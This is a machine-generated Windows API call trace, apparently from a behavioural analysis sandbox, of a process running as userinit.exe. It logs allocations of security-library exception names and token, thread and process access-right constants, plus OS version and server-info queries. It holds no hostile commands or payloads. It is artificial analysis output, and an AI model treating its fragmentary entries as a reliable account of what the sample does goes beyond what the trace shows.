[0169.934] SysReAllocStringLen (in: pbstr=0x291ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x291ef10*="EJwsclInvalidTokenHandle") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x291eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x291eee0*="EJwsclDuplicateTokenException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x291eec8*="EJwsclInvalidOwnerException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x291eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x291ee98*="EJwsclTokenPrimaryException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x291ee80*="EJwsclTokenImpersonationException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x291ee68*="EJwsclTokenInformationException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x291ee50*="EJwsclSharedTokenException") returned 1
[0169.935] SysReAllocStringLen (in: pbstr=0x291ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x291ee38*="EJwsclOpenProcessTokenException") returned 1
[0169.935] SysReAllocStringLen (in: pbstr=0x291ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x291ee20*="EJwsclOpenThreadTokenException") returned 1
[0169.935] SysReAllocStringLen (in: pbstr=0x291ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x291ee08*="EJwsclSecurityException") returned 1
[0169.935] SysReAllocStringLen (in: pbstr=0x291edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x291edf0*="Exception") returned 1
[0169.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0169.935] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0169.935] GetVersionExA (in: lpVersionInformation=0x1af7f4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x2b0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\x1cø\x1a") | out: lpVersionInformation=0x1af7f4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0169.935] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0169.935] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0169.941] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0169.941] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x1af878 | out: bufptr=0x1af878) returned 0x0
[0169.996] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0169.996] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0169.996] NetApiBufferFree (Buffer=0x2d1d00) returned 0x0
[0169.996] SetErrorMode (uMode=0x8000) returned 0x1
[0169.996] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0169.996] SetErrorMode (uMode=0x1) returned 0x8000
[0169.996] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0169.998] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0169.999] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0170.001] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0170.002] SysReAllocStringLen (in: pbstr=0x291ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291ec40*="DELETE") returned 1
[0170.002] SysReAllocStringLen (in: pbstr=0x291ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291ec30*="READ_CONTROL") returned 1
[0170.002] SysReAllocStringLen (in: pbstr=0x291ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291ec20*="WRITE_OWNER") returned 1
[0170.002] SysReAllocStringLen (in: pbstr=0x291ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291ec10*="WRITE_DAC") returned 1
[0170.002] SysReAllocStringLen (in: pbstr=0x291ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x291ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0170.002] SysReAllocStringLen (in: pbstr=0x291ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x291ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0170.002] SysReAllocStringLen (in: pbstr=0x291ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x291ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0170.002] SysReAllocStringLen (in: pbstr=0x291ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x291ebd0*="FILE_WRITE_DATA") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x291ebc0*="FILE_READ_DATA") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x291ebb0*="FILE_ALL_ACCESS") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291eb80*="STANDARD_RIGHTS_READ") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291eb70*="STANDARD_RIGHTS_ALL") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291eb50*="DELETE") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291eb40*="READ_CONTROL") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291eb30*="WRITE_OWNER") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291eb20*="WRITE_DAC") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x291eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x291eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x291eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x291eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x291ead0*="TOKEN_QUERY_SOURCE") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x291eac0*="TOKEN_QUERY") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x291eab0*="TOKEN_IMPERSONATE") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x291eaa0*="TOKEN_DUPLICATE") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x291ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x291ea80*="TOKEN_ALL_ACCESS") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291ea50*="STANDARD_RIGHTS_READ") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291ea40*="STANDARD_RIGHTS_ALL") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291ea30*="DELETE") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291ea20*="READ_CONTROL") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291ea10*="WRITE_OWNER") returned 1
[0170.003] SysReAllocStringLen (in: pbstr=0x291ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291ea00*="WRITE_DAC") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x291e9f0*="TIMER_MODIFY_STATE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x291e9e0*="TIMER_QUERY_STATE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x291e9d0*="TIMER_ALL_ACCESS") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e9a0*="STANDARD_RIGHTS_READ") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e990*="STANDARD_RIGHTS_ALL") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e980*="DELETE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e970*="READ_CONTROL") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e960*="WRITE_OWNER") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e950*="WRITE_DAC") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x291e940*="SECTION_EXTEND_SIZE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x291e930*="FILE_MAP_READ") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x291e920*="FILE_MAP_WRITE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x291e910*="FILE_MAP_COPY") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x291e900*="FILE_MAP_ALL_ACCESS") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e8d0*="STANDARD_RIGHTS_READ") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e8b0*="DELETE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e8a0*="READ_CONTROL") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e890*="WRITE_OWNER") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e880*="WRITE_DAC") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x291e870*="MUTEX_MODIFY_STATE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x291e860*="MUTEX_ALL_ACCESS") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e840*="STANDARD_RIGHTS_WRITE") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e830*="STANDARD_RIGHTS_READ") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e820*="STANDARD_RIGHTS_ALL") returned 1
[0170.004] SysReAllocStringLen (in: pbstr=0x291e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e810*="DELETE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e800*="READ_CONTROL") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e7f0*="WRITE_OWNER") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e7e0*="WRITE_DAC") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x291e7d0*="EVENT_MODIFY_STATE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x291e7c0*="EVENT_ALL_ACCESS") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e790*="STANDARD_RIGHTS_READ") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e780*="STANDARD_RIGHTS_ALL") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e770*="DELETE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e760*="READ_CONTROL") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e750*="WRITE_OWNER") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e740*="WRITE_DAC") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x291e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x291e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e700*="STANDARD_RIGHTS_WRITE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e6f0*="STANDARD_RIGHTS_READ") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e6d0*="DELETE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e6c0*="READ_CONTROL") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e6b0*="WRITE_OWNER") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e6a0*="WRITE_DAC") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x291e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x291e680*="JOB_OBJECT_TERMINATE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x291e670*="JOB_OBJECT_QUERY") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x291e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x291e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x291e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e620*="STANDARD_RIGHTS_WRITE") returned 1
[0170.005] SysReAllocStringLen (in: pbstr=0x291e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e610*="STANDARD_RIGHTS_READ") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e600*="STANDARD_RIGHTS_ALL") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e5f0*="DELETE") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e5e0*="READ_CONTROL") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e5d0*="WRITE_OWNER") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e5c0*="WRITE_DAC") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x291e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x291e5a0*="THREAD_IMPERSONATE") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x291e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x291e580*="THREAD_QUERY_INFORMATION") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x291e570*="THREAD_SET_INFORMATION") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x291e560*="THREAD_SET_CONTEXT") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x291e550*="THREAD_GET_CONTEXT") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x291e540*="THREAD_SUSPEND_RESUME") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x291e530*="THREAD_TERMINATE") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x291e520*="THREAD_ALL_ACCESS") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e500*="STANDARD_RIGHTS_WRITE") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e4f0*="STANDARD_RIGHTS_READ") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e4d0*="DELETE") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e4c0*="READ_CONTROL") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e4b0*="WRITE_OWNER") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e4a0*="WRITE_DAC") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x291e490*="PROCESS_QUERY_INFORMATION") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x291e480*="PROCESS_SET_INFORMATION") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x291e470*="PROCESS_SET_QUOTA") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x291e460*="PROCESS_CREATE_PROCESS") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x291e450*="PROCESS_DUP_HANDLE") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x291e440*="PROCESS_VM_WRITE") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x291e430*="PROCESS_VM_READ") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x291e420*="PROCESS_VM_OPERATION") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x291e410*="PROCESS_SET_SESSIONID") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x291e400*="PROCESS_CREATE_THREAD") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x291e3f0*="PROCESS_TERMINATE") returned 1
[0170.006] SysReAllocStringLen (in: pbstr=0x291e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x291e3e0*="PROCESS_ALL_ACCESS") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e3c0*="STANDARD_RIGHTS_WRITE") returned 1
